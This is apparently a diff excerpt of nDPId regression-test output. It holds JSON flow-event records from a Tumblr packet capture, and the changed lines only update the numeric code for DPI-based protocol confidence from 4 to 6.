+00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1605292102602,"flow_last_seen":1605292122470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":35234,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292114506,"flow_last_seen":1605292114736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292114506,"flow_last_seen":1605292114736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108796,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
@@ -212,7 +212,7 @@ 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102219,"flow_last_seen":1605292102653,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108796,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108796,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605292105433,"flow_last_seen":1605292106000,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7251,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"}} +00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605292105433,"flow_last_seen":1605292106000,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7251,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"}} 
00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605292121674,"flow_last_seen":1605292122517,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102603,"flow_last_seen":1605292102678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102603,"flow_last_seen":1605292102678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -224,14 +224,14 @@ 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49496,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605292122064,"flow_last_seen":1605292122440,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6040,"flow_tot_l4_payload_len":76219,"flow_avg_l4_payload_len":712,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605292122064,"flow_last_seen":1605292122440,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6040,"flow_tot_l4_payload_len":76219,"flow_avg_l4_payload_len":712,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605292104650,"flow_last_seen":1605292122733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292119370,"flow_last_seen":1605292119458,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292119370,"flow_last_seen":1605292119458,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":21017,"flow_first_seen":1605292105669,"flow_last_seen":1605292122890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2772,"flow_tot_l4_payload_len":20045142,"flow_avg_l4_payload_len":953,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":21017,"flow_first_seen":1605292105669,"flow_last_seen":1605292122890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2772,"flow_tot_l4_payload_len":20045142,"flow_avg_l4_payload_len":953,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57788,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57788,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1671,"flow_first_seen":1605292108895,"flow_last_seen":1605292115212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2426,"flow_tot_l4_payload_len":1035742,"flow_avg_l4_payload_len":619,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1671,"flow_first_seen":1605292108895,"flow_last_seen":1605292115212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2426,"flow_tot_l4_payload_len":1035742,"flow_avg_l4_payload_len":619,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}} 00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122698,"flow_last_seen":1605292122741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122698,"flow_last_seen":1605292122741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45706,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
@@ -240,16 +240,16 @@ 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120839,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::200e","src_port":58004,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118602,"flow_last_seen":1605292118777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d582","src_port":50906,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118602,"flow_last_seen":1605292118777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d582","src_port":50906,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1605292103810,"flow_last_seen":1605292122755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2294,"flow_tot_l4_payload_len":522833,"flow_avg_l4_payload_len":606,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1605292103810,"flow_last_seen":1605292122755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2294,"flow_tot_l4_payload_len":522833,"flow_avg_l4_payload_len":606,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":1288,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605292105197,"flow_last_seen":1605292105378,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":19710,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1605292105274,"flow_last_seen":1605292105347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605292105197,"flow_last_seen":1605292105378,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":19710,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1605292105274,"flow_last_seen":1605292105347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2002","src_port":35892,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
